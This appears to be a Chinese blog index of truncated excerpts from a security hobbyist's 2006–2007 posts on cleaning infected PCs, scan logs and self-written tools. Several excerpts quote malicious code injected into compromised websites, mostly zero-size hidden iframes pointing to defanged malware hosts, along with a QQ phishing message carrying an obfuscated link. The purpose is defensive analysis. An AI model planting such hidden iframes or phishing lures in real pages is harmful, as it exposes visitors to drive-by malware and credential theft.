其他

endurer 原創2007-05-14 第2版 補充瑞星的反應2007-05-10 第1版一位朋友說他的電腦中的瑞星的即時監控會自動關閉，即使手動開啟後，過一會又會自動關閉，隨身碟也打不開，讓偶幫忙檢修。檢查發現，這位朋友用的瑞星病毒庫是2007-02-11的，升不了級。用 pe_xscan 掃描 log 並分析，發現如下可疑項：/===pe_xscan 07-03-17 by Purple Endurer2007-5-10 21:31:14Windows XP Service Pack 2(

endurer 原創2007-05-11 第1版該網站頁面被植入代碼：/---＜iframe src=hxxp://web**.5***9*cn.cn/n*a***p*ole*on/windows**/index.htm width=0

endurer　原創2006-10-08　第1版QQ自動發送的資訊為：/--------看看我最近的照片~~~ 才掃描到Q-Zone空間上的。是不是有點太露了.... hxxp://Q-Zone.***QQ.C0M.%34%76%30***%2E%63%6E/**Photo/Cgi_Bin&387**381/--------/點擊該連結開啟的網頁首部有用自訂函數 psw（）加密的JavaScript指令碼代碼。解密後為：/--------＜iframe src＝hxxp://web***

　　當我們用HijackThis、pe_xscan等系統分析軟體發現可疑檔案，或者發現病毒檔案時，要把這些位於不同檔案夾的可疑檔案和病毒檔案分別設定密碼壓縮打包，即使是寫一個BAT檔案也比較麻煩！現在好了，用“檔案批處理器 / bat_do”可以方便地為我們完成這些工作！0、目錄===========1、程式基本資料2、版本更新記錄3、程式介面4、開發緣由5、聲明6、使用說明7、8、聯絡作者1、程式基本資料===========版　　本：0.0.0003

某留學網站被植入利用 PPStream 堆棧漏洞的代碼endurer 原創2007-09-30 第1版網站被植入代碼：/---＜iframe src=hxxp://xxx.7**45*97**0.com/newdm/new05.htm?075 width=0 height=0＞＜/iframe＞ ---/hxxp://xxx.7**45*97**0.com/newdm/new05.htm?075 包含代碼：/---＜iframe width='0' height='0' src='hxxp://

endurer 原創2006-10-13 第3版 補充 Kaspersky 對偶未上報的檔案的反應2006-10-09 第2版 補充 Kaspersky 的反應2006-10-09 第1版一位網友，新買的機子，沒用兩天就喊慢，讓我幫忙檢查。開機進入案頭後，系統失去響應，好不容易開啟工作管理員一看，CPU佔用率並不高，但記憶體佔用奇高，想順利關機都不行。強行重啟到帶網路的安全模式，到 http://endurer.ys168.com 下載 HijackThis 掃描

;<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<; Function: Demo the meth

endurer 原創2007-05-16 第1版今天上午，我們單位裡的電腦，開啟國內網站的網頁都報病毒卡巴都報：/---已檢測到: 惡意程式 Exploit.Win32.IMG-ANI.gen (修改) URL: hxxp://q***.z*px**5**2*0.com/w***.js---/瑞星都報發現：Trojan.DL.VBS.Agent.cog、Hack.SuspiciousAni。檢查這些被報含病毒的網頁的原始碼，發現頭部都被加入了代碼：/---＜iframe src＝'hxxp://

endurer 原創2007-05-27 第1版剛才去 某論壇上掛的東東，JPG圖片 or 病毒Trojan.Win32.VB.azc？ http://endurer.bokee.com/6279320.htmlhttp://blog.sina.com.cn/u/49926d91010008qjhttp://blog.csdn.net/Purpleendurer/archive/2007/05/17/1613097.aspxhttp://purple-endurer.blogspot.com/2

　　當我們用HijackThis等軟體發現可疑檔案，或者發現病毒檔案時，要把這些位於不同檔案夾的可疑檔案和病毒檔案分別設定密碼壓縮打包，即使是寫一個BAT檔案也比較麻煩！現在好了，用“檔案批處理器 / bat_do”可以方便地為我們完成這些工作！0、目錄===========1、程式基本資料2、版本更新記錄3、程式介面4、開發緣由5、聲明6、使用說明7、8、聯絡作者1、程式基本資料===========版　　本：0.0.0002作　　者：紫郢劍俠|Purple Endurer開發環境：MASM3

endurer 原創2007-05-17 第1版前幾天，開啟某論壇時，Kaspersky報告：已檢測 木馬程式 Trojan-Downloader.HTML.Agent.df檢查網頁發現首部被植入代碼：/---＜script language＝"javascript"

用MASM32寫了個系統托盤表徵圖管理者 TrayIconMan檔案說明符 : F:/masm32/works/TrayIconMan/TrayIconMan.exe屬性 : A---語言 : 中文(中國)檔案版本 : 0.0.0001說明 : TrayIconMan | 系統托盤表徵圖管理者著作權 : PurpleEndurer備忘 : 產品版本 : 0.0.0001產品名稱 : TrayIconMan公司名稱 : PurpleEndurer | 紫郢劍俠㊣ 合法商標 :

endurer 原創2007-05-19 第1版分析了一下ARP病毒“吃裡巴外”？http://endurer.bokee.com/6277614.htmlhttp://blog.csdn.net/Purpleendurer/archive/2007/05/16/1611620.aspxhttp://blog.sina.com.cn/u/49926d91010008q6中自動添加的網址 hxxp://www.z*px**5**2*0.com/0***.htm其中包含兩處惡意代碼。其1是：/---

endurer 原創2007-06-03 第1版電腦開機進入案頭後，瑞星自動開始掃描，隨即報告 C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/124161561552.tmp  感染 Trojan.DL.VBS.Agent.cns經檢查，開啟其它網站的網頁，沒有問題，但只要開啟瑞星殺毒程式就會報毒。仔細一看瑞星殺軟的資訊中心，發現居然是：毒軟體2007版--資訊中心！檢查瑞星殺軟的資訊中心網頁的代碼，發現/---＜iframe src＝"hxxp://nx.vod***3

endurer　原創2006-09-23　第1版有位網友的電腦經常發現病毒，手動掃描也清除不乾淨。讓我幫忙檢查一下。到 http://endurer.ys168.com 下載HijackThis掃描log，發現以下可疑項： /----------HijackThis_zww漢化版掃描日誌 V1.99.1儲存於      0:30:24, 日期 2006-9-19作業系統：  Windows XP SP2 (WinNT 5.01.2600)瀏覽器：    Internet Explorer v6.

近期惡意程式利用 映像劫持 (Image_File_Execution_Options，IFEO) 的比較多，可以有來阻止抗病毒程式，防火牆軟體等系統安全防護程式的運行，並啟用惡意程式等。所以在 pe_xscan 加入對 映像劫持 (Image_File_Execution_Options，IFEO) 的掃描另外就是為 pe_xscan 的 log 中的O24 和 O25  項加入標記，因為這兩項是 HijackThis 的簡明 log 所沒有的，所以標記是偶自己定的。

endurer 原創2007-05-07 第1版昨天一位朋友說他的電腦查殺出了病毒，讓偶協助看看。下載了 pe_xscan 掃描 log 並分析，發現如下可疑項：pe_xscan 07-03-17 by Purple Endurer2007-5-6 10:35:46Windows XP Service Pack 2(5.1.2600)管理使用者組O2 - BHO IEObject Class - {5F5422F7-7159-4CB6-BE7D-2C7EED492762} -

endurer 原創2007-04-01 第2版 補充了Kasersky對一些可疑檔案的反應2007-04-01 第1版前兩天，一位網友的電腦的瑞星報告發現RootKit.Agent.va，檔案名稱為ynqcq.sys，但清除不了，又使用一個木馬查殺軟體發現有廣告軟體，因為是未註冊，無法清除。瑞星的登入前掃描對付rootkit是不錯的，可惜這位網友使用了自動登入Windows……用 pe_xscan 掃描日誌，發現如下可疑項（有了分析網頁，效率提高了很多）：/---pe_xscan 07-03-

endurer 原創2007-04-02 第1版昨天，一位網友說他的電腦中了病毒Trojan-PSW.Win32.OnLineGames.jj等，Kaspersky 6殺不了，讓偶幫忙處理。到他家時，他正在用Kaspersky 6全面掃描，發現一些病毒，彈出詢問提示框，還沒等我們選擇處理方式，就關閉了。掃描完成後，系統自動重啟。選擇帶網路連接的安全模式，啟動Kaspersky 6，匯出查殺記錄如下：/---007-4-1 12:52:50 檔案 C:/SysWsj7/Ghook.dll:

endurer 原創2007-05-08 第1版一位朋友，說他的電腦最近運行很慢，讓偶幫忙檢修。下載 pe_xscan 掃描 log 並分析，發現如下可疑項：/---pe_xscan 07-04-12 by Purple Endurer2007-5-8 12:12:51Windows XP Service Pack 2(5.1.2600)管理使用者組[System Process] * 0    C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/~Tm22.tmp.rom |